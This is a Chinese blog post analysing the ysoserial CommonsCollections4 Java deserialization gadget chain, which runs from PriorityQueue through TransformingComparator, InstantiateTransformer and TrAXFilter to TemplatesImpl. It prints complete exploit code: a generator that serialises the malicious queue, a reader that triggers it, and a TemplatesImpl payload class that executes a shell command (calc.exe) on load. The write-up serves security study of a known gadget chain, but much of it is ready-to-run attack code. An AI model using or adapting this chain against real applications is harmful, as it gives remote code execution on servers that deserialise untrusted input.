java反序列化-ysoserial-调试分析总结篇(4)
2024-09-07 08:31:18
1.前言
这篇文章继续分析commoncollections4利用链,这篇文章是对cc2的改造,和cc3一样,cc3是对cc1的改造,cc4则是对cc2的改造,里面chained的invoke变成了instantiateTransformer,所以不用invoke反射调用方法,所以外层queue里面放的元素随意
缩减版的函数调用栈如下图所示:
2.利用链分析:
调用还是从PriorityQueue.readObject函数开始
一直到org/apache/commons/collections4/comparators/TransformingComparator.class的compare函数中将调用chainedTransformer的transform方法了
这里第一个要利用的还是ConstantTransformer,要返回TrAXfilter类
接下来第二轮将调用Traxfilter类入口参数类型为Templates的构造函数,并且实例化调用该构造函数传入templatesImpl类的实例
接下来到TraxFilter的构造函数中将调用templatesImpl.newTransformer(),就可以是实例化_bytecode中存储的类进行rce了
yso构造分析:
首先构造一个Templates类的实例,然后开始构造chianed链需要的东西,首先就是一个Constanttransformer
然后再构造chained的第二个元素就是该链相对于cc2的区别为InstantiateTransformer类
接下来将两个transformer放进chaind,并且构造外层的PriorityQueue,并将chined放入TransformingComparator,然后再将Templates放到instantiate实例的参数和参数类型中,至此
就构造结束了
手动exp构造:
exp.java
package CommonsCollections4;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.ComparableComparator;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer; import javax.xml.transform.Templates;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue; public class exp {
public static void main(String[] args) throws IOException, CannotCompileException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException, NotFoundException {
TemplatesImpl tmp = new TemplatesImpl();
ClassPool pool = ClassPool.getDefault();
pool.insertClassPath(new ClassClassPath(payload.class)); CtClass pay_class = pool.get(payload.class.getName());
byte[] payCode = pay_class.toBytecode();
Class clazz;
clazz =Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");
//存储payload类
Field byteCode = clazz.getDeclaredField("_bytecodes");
byteCode.setAccessible(true);
byteCode.set(tmp,new byte[][]{payCode});
Field name = clazz.getDeclaredField("_name");
name.setAccessible(true);
name.set(tmp,"tr1ple"); Transformer[] trans = new Transformer[]{
new ConstantTransformer(TrAXFilter.class),
new InstantiateTransformer(
new Class[]{Templates.class},
new Object[]{tmp})
}; ChainedTransformer chian = new ChainedTransformer(trans);
//PriorityQueue<Object> queue = new PriorityQueue(2,new TransformingComparator(chian));
TransformingComparator transCom = new TransformingComparator(chian); PriorityQueue queue = new PriorityQueue(2);
queue.add(1);
queue.add(1); Field com = PriorityQueue.class.getDeclaredField("comparator");
com.setAccessible(true);
com.set(queue,transCom); //序列化
File file;
file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
ObjectOutputStream obj_out = new ObjectOutputStream(new FileOutputStream(file));
obj_out.writeObject(queue); }
}
readobj.java
package CommonsCollections4; import java.io.*;
import java.lang.Runtime; public class readObj {
public static void main(String[] args) throws IOException, ClassNotFoundException {
File file;
file = new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commonscollections4.ser");
ObjectInputStream obj = new ObjectInputStream(new FileInputStream(file));
obj.readObject();
}
}
payload.java
package CommonsCollections4; import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler; import java.io.IOException; public class payload extends AbstractTranslet {
{
try {
Runtime.getRuntime().exec("calc.exe");
} catch (IOException e) {
e.printStackTrace();
}
}
public payload(){
System.out.println("tr1ple 2333");
} public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
} public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
}
最新文章
- 在线浏览PDF之PDF.JS (附demo)
- GO语言下载、安装、配置
- 排序算法总结第二弹----冒泡排序---javascript描述
- PHP intval()
- Verilog HDL那些事_建模篇笔记(实验一,实验二)
- S1:new操作符
- [转]GCC参数详解
- UI1_ScrollViewHomeWork
- Visual Studio中的一些较大的文件的作用
- Oracle正则表达式
- canvas 渐变
- 【HDOJ】2492 Ping pong
- Spark2.0编译
- Ubuntu14.04安装完全分布式Hadoop1.2.1
- 【Unity3D技术文档翻译】第1.5篇 本地使用 AssetBundles
- JS中清空字符串前后空格
- extjs__(grid Panel绑定数据)
- Web方面的错误, 异常来自hresult:0x80070057(E_INVALIDARG)
- 面向对象+JAVA基础
- Linux基础命令---join
热门文章
- set_include_path详细解释(转)
- Spring Boot使用Liquibase最佳实践
- JavaWeb过滤器(Filter)
- Linux平台下_tomcat的安装与优化
- windows 环境下Maven私服搭建
- A component required a bean named xxx that could not be found. Action: Consider defining
- StartDT AI Lab | 视觉智能引擎之算法模型加速
- 吴裕雄--天生自然 JAVA开发学习:发送邮件
- 使用mui框架开发App,当input获取焦点时,键盘弹出,底部导航栏上升。
- 68.26-95.44-99.74 rule|empirical rule